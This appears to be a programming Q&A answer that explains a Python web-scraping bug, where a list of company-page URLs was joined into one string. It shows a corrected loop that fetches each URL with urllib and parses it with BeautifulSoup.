'expCompany.aspx?corpid=1058881186',
'expCompany.aspx?corpid=0809557305',
'expCompany.aspx?corpid=1265998039',
'expCompany.aspx?corpid=1188093431',
'expCompany.aspx?corpid=0995572026',
'expCompany.aspx?corpid=1036184837',
'expCompany.aspx?corpid=0990573086',
'expCompany.aspx?corpid=1464212531'],
['expCompany.aspx?corpid=0858351382',
'expCompany.aspx?corpid=1348806571',
'expCompany.aspx?corpid=0822452086',
'expCompany.aspx?corpid=1428413902',
'expCompany.aspx?corpid=0879752062',
'expCompany.aspx?corpid=1369405760',
'expCompany.aspx?corpid=1256000612',
'expCompany.aspx?corpid=1037680042',
'expCompany.aspx?corpid=1062381570',
'expCompany.aspx?corpid=1461915811'],
['expCompany.aspx?corpid=1373808159',
'expCompany.aspx?corpid=1027382040',
'expCompany.aspx?corpid=1191393458',
'expCompany.aspx?corpid=1133389590',
'expCompany.aspx?corpid=0762910036',
'expCompany.aspx?corpid=1399206654',
'expCompany.aspx?corpid=1253598637',
'expCompany.aspx?corpid=1128889405',
'expCompany.aspx?corpid=1082384190',
'expCompany.aspx?corpid=1077881359'],
['expCompany.aspx?corpid=1584325065',
'expCompany.aspx?corpid=1131692156',
'expCompany.aspx?corpid=1587322969',
'expCompany.aspx?corpid=1251100353',
'expCompany.aspx?corpid=1115590386',
'expCompany.aspx?corpid=1541424572',
'expCompany.aspx?corpid=1137393378',
'expCompany.aspx?corpid=1069988131',
'expCompany.aspx?corpid=1392806069',
'expCompany.aspx?corpid=0766210029'],
['expCompany.aspx?corpid=1143394259',
'expCompany.aspx?corpid=1561819111',
'expCompany.aspx?corpid=1349307520']]
str1 in your case contains a list of URLs. You are joining this list of URLs into a single string separated by newlines and then try to navigate to that mix which of course would not work.
Instead, you meant to loop over the extracted URLs one by one and navigate:
linksfromcategories = [string + x for x in linksfromcategories]
for link in linksfromcategories:
print(link)
lfc = urllib.request.urlopen(link).read()
soup2 = BeautifulSoup(lfc,"html.parser")
print(soup2)

Categories

Resources